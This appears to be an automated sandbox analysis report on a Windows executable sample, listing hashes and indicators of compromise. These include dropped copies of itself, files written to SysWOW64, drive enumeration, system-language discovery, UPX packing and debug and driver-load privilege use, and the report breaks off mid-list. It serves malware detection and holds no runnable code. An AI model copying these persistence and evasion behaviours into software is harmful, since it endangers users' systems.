Analysis
-
max time kernel
150s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
28-09-2024 04:21
Behavioral task
behavioral1
Sample
fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe
Resource
win7-20240708-en
windows7-x64
14 signatures
150 seconds
General
-
Target
fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe
-
Size
86KB
-
MD5
fb7e4180110ac2917b6a1f816438c7b9
-
SHA1
392ae561ded6639279ceef98fe800538fc3eda76
-
SHA256
d7e299c1f844e0714d1e072f371c53929322fab99aa8fc9e73433f12994e1568
-
SHA512
e3b66b2e4a86fbb3cabe71c96dfa924c55b5d119c6cfcf0929f93bc2135dc401d35cbdc5772e9c6f6aef8a48cd4e0f2a9d311ddd3923c8cae47dcc5874fe453d
-
SSDEEP
1536:vKec0Px8LhsjgyFL3raHLASSPh5I+C1ORnD0e/PTPBeXFpNDp:yi8m0yJPD1C1qD0+Jef
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 15424 Process not Found -
Executes dropped EXE 64 IoCs
pid Process 2388 FVe1JJh.exe 2664 sUUAXgs.exe 2860 sUUAXgs.exe 2936 sUUAXgs.exe 2708 sUUAXgs.exe 2528 sUUAXgs.exe 2572 sUUAXgs.exe 2232 sUUAXgs.exe 2104 sUUAXgs.exe 2748 sUUAXgs.exe 1664 sUUAXgs.exe 1784 sUUAXgs.exe 2068 sUUAXgs.exe 1264 sUUAXgs.exe 1336 sUUAXgs.exe 2876 sUUAXgs.exe 2908 sUUAXgs.exe 2896 sUUAXgs.exe 3056 sUUAXgs.exe 2184 sUUAXgs.exe 1428 sUUAXgs.exe 380 sUUAXgs.exe 2960 sUUAXgs.exe 1696 sUUAXgs.exe 736 sUUAXgs.exe 1076 sUUAXgs.exe 1960 sUUAXgs.exe 2040 sUUAXgs.exe 748 sUUAXgs.exe 1892 sUUAXgs.exe 1544 sUUAXgs.exe 1540 sUUAXgs.exe 108 sUUAXgs.exe 2220 sUUAXgs.exe 2968 sUUAXgs.exe 2228 sUUAXgs.exe 3052 sUUAXgs.exe 2208 sUUAXgs.exe 1252 sUUAXgs.exe 1504 sUUAXgs.exe 1668 sUUAXgs.exe 868 sUUAXgs.exe 2436 sUUAXgs.exe 2468 sUUAXgs.exe 1608 sUUAXgs.exe 1600 sUUAXgs.exe 1520 sUUAXgs.exe 2260 sUUAXgs.exe 2680 sUUAXgs.exe 2796 sUUAXgs.exe 2372 sUUAXgs.exe 2692 sUUAXgs.exe 2824 sUUAXgs.exe 2740 sUUAXgs.exe 2188 sUUAXgs.exe 1032 sUUAXgs.exe 2644 sUUAXgs.exe 2540 sUUAXgs.exe 2608 sUUAXgs.exe 2580 sUUAXgs.exe 2196 sUUAXgs.exe 1532 sUUAXgs.exe 2788 sUUAXgs.exe 1548 sUUAXgs.exe -
Loads dropped DLL 64 IoCs
pid Process 2388 FVe1JJh.exe 2388 FVe1JJh.exe 2664 sUUAXgs.exe 2664 sUUAXgs.exe 2860 sUUAXgs.exe 2860 sUUAXgs.exe 2936 sUUAXgs.exe 2936 sUUAXgs.exe 2708 sUUAXgs.exe 2708 sUUAXgs.exe 2528 sUUAXgs.exe 2528 sUUAXgs.exe 2572 sUUAXgs.exe 2572 sUUAXgs.exe 2232 sUUAXgs.exe 2232 sUUAXgs.exe 2104 sUUAXgs.exe 2104 sUUAXgs.exe 2748 sUUAXgs.exe 2748 sUUAXgs.exe 1664 sUUAXgs.exe 1664 sUUAXgs.exe 1784 sUUAXgs.exe 1784 sUUAXgs.exe 2068 sUUAXgs.exe 2068 sUUAXgs.exe 1264 sUUAXgs.exe 1264 sUUAXgs.exe 1336 sUUAXgs.exe 1336 sUUAXgs.exe 2876 sUUAXgs.exe 2876 sUUAXgs.exe 2908 sUUAXgs.exe 2908 sUUAXgs.exe 2896 sUUAXgs.exe 2896 sUUAXgs.exe 3056 sUUAXgs.exe 3056 sUUAXgs.exe 2184 sUUAXgs.exe 2184 sUUAXgs.exe 1428 sUUAXgs.exe 1428 sUUAXgs.exe 380 sUUAXgs.exe 380 sUUAXgs.exe 2960 sUUAXgs.exe 2960 sUUAXgs.exe 1696 sUUAXgs.exe 1696 sUUAXgs.exe 736 sUUAXgs.exe 736 sUUAXgs.exe 1076 sUUAXgs.exe 1076 sUUAXgs.exe 1960 sUUAXgs.exe 1960 sUUAXgs.exe 2040 sUUAXgs.exe 2040 sUUAXgs.exe 748 sUUAXgs.exe 748 sUUAXgs.exe 1892 sUUAXgs.exe 1892 sUUAXgs.exe 1544 sUUAXgs.exe 1544 sUUAXgs.exe 1540 sUUAXgs.exe 1540 sUUAXgs.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\l: sUUAXgs.exe File opened (read-only) \??\t: sUUAXgs.exe File opened (read-only) \??\m: Process not Found File opened (read-only) \??\i: Process not Found File opened (read-only) \??\o: Process not Found File opened (read-only) \??\w: sUUAXgs.exe File opened (read-only) \??\g: sUUAXgs.exe File opened (read-only) \??\y: sUUAXgs.exe File opened (read-only) \??\z: Process not Found File opened (read-only) \??\o: Process not Found File opened (read-only) \??\v: Process not Found File opened (read-only) \??\q: sUUAXgs.exe File opened (read-only) \??\q: sUUAXgs.exe File opened (read-only) \??\j: sUUAXgs.exe File opened (read-only) \??\i: sUUAXgs.exe File opened (read-only) \??\s: Process not Found File opened (read-only) \??\z: Process not Found File opened (read-only) \??\r: Process not Found File opened (read-only) \??\p: Process not Found File opened (read-only) \??\v: sUUAXgs.exe File opened (read-only) \??\k: sUUAXgs.exe File opened (read-only) \??\e: sUUAXgs.exe File opened (read-only) \??\r: sUUAXgs.exe File opened (read-only) \??\v: Process not Found File opened (read-only) \??\x: Process not Found File opened (read-only) \??\h: Process not Found File opened (read-only) \??\s: Process not Found File opened (read-only) \??\m: Process not Found File opened (read-only) \??\z: Process not Found File opened (read-only) \??\r: Process not Found File opened (read-only) \??\t: sUUAXgs.exe File opened (read-only) \??\n: Process not Found File opened (read-only) \??\i: Process not Found File opened (read-only) \??\r: Process not Found File opened (read-only) \??\o: Process not Found File opened (read-only) \??\g: Process not Found File opened (read-only) \??\x: Process not Found File opened (read-only) \??\n: sUUAXgs.exe File opened (read-only) \??\t: sUUAXgs.exe File opened (read-only) \??\z: Process not Found File opened (read-only) \??\k: Process not Found File opened (read-only) \??\g: Process not Found File opened (read-only) \??\z: Process not Found File opened (read-only) \??\v: sUUAXgs.exe File opened (read-only) \??\n: sUUAXgs.exe File opened (read-only) \??\x: sUUAXgs.exe File opened (read-only) \??\t: sUUAXgs.exe File opened (read-only) \??\m: Process not Found File opened (read-only) \??\u: Process not Found File opened (read-only) \??\n: sUUAXgs.exe File opened (read-only) \??\s: Process not Found File opened (read-only) \??\e: Process not Found File opened (read-only) \??\s: Process not Found File opened (read-only) \??\s: Process not Found File opened (read-only) \??\y: Process not Found File opened (read-only) \??\o: sUUAXgs.exe File opened (read-only) \??\s: sUUAXgs.exe File opened (read-only) \??\m: sUUAXgs.exe File opened (read-only) \??\g: sUUAXgs.exe File opened (read-only) \??\p: Process not Found File opened (read-only) \??\r: Process not Found File opened (read-only) \??\j: Process not Found File opened (read-only) \??\e: Process not Found File opened (read-only) \??\v: sUUAXgs.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe -
resource yara_rule behavioral1/files/0x000f000000012782-4.dat upx behavioral1/memory/2388-9-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2388-15-0x0000000000490000-0x00000000004DA000-memory.dmp upx behavioral1/memory/2664-21-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2388-28-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2664-35-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2528-38-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2860-41-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2708-52-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2232-53-0x0000000000490000-0x00000000004DA000-memory.dmp upx behavioral1/memory/2936-46-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2748-62-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2572-64-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2528-58-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2572-66-0x0000000000260000-0x00000000002AA000-memory.dmp upx behavioral1/memory/1664-69-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2232-71-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2068-81-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2104-79-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1264-87-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2748-85-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1664-90-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1784-94-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2068-99-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2876-98-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1264-103-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/3056-110-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1336-109-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2876-113-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1428-121-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/3056-126-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2896-123-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2908-118-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2960-128-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2184-129-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1428-132-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/736-134-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/380-133-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2960-136-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1960-137-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1696-138-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/736-142-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/748-144-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1076-145-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1960-146-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2040-148-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/748-150-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1892-152-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1544-154-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1540-156-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2228-159-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/108-160-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/3052-162-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2220-163-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2228-169-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1252-167-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2968-165-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/3052-170-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1668-171-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2208-172-0x0000000000400000-0x000000000044A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{1B330C41-7D51-11EF-B33F-CE9644F3BBBD} = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar IEXPLORE.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe Token: SeLoadDriverPrivilege 2388 FVe1JJh.exe Token: SeLoadDriverPrivilege 2664 sUUAXgs.exe Token: SeLoadDriverPrivilege 2860 sUUAXgs.exe Token: SeLoadDriverPrivilege 2936 sUUAXgs.exe Token: SeLoadDriverPrivilege 2708 sUUAXgs.exe Token: SeLoadDriverPrivilege 2528 sUUAXgs.exe Token: SeLoadDriverPrivilege 2572 sUUAXgs.exe Token: SeLoadDriverPrivilege 2232 sUUAXgs.exe Token: SeLoadDriverPrivilege 2104 sUUAXgs.exe Token: SeLoadDriverPrivilege 2748 sUUAXgs.exe Token: SeLoadDriverPrivilege 1664 sUUAXgs.exe Token: SeLoadDriverPrivilege 1784 sUUAXgs.exe Token: SeLoadDriverPrivilege 2068 sUUAXgs.exe Token: SeLoadDriverPrivilege 1264 sUUAXgs.exe Token: SeLoadDriverPrivilege 1336 sUUAXgs.exe Token: SeLoadDriverPrivilege 2876 sUUAXgs.exe Token: SeLoadDriverPrivilege 2908 sUUAXgs.exe Token: SeLoadDriverPrivilege 2896 sUUAXgs.exe Token: SeLoadDriverPrivilege 3056 sUUAXgs.exe Token: SeLoadDriverPrivilege 2184 sUUAXgs.exe Token: SeLoadDriverPrivilege 1428 sUUAXgs.exe Token: SeLoadDriverPrivilege 380 sUUAXgs.exe Token: SeLoadDriverPrivilege 2960 sUUAXgs.exe Token: SeLoadDriverPrivilege 1696 sUUAXgs.exe Token: SeLoadDriverPrivilege 736 sUUAXgs.exe Token: SeLoadDriverPrivilege 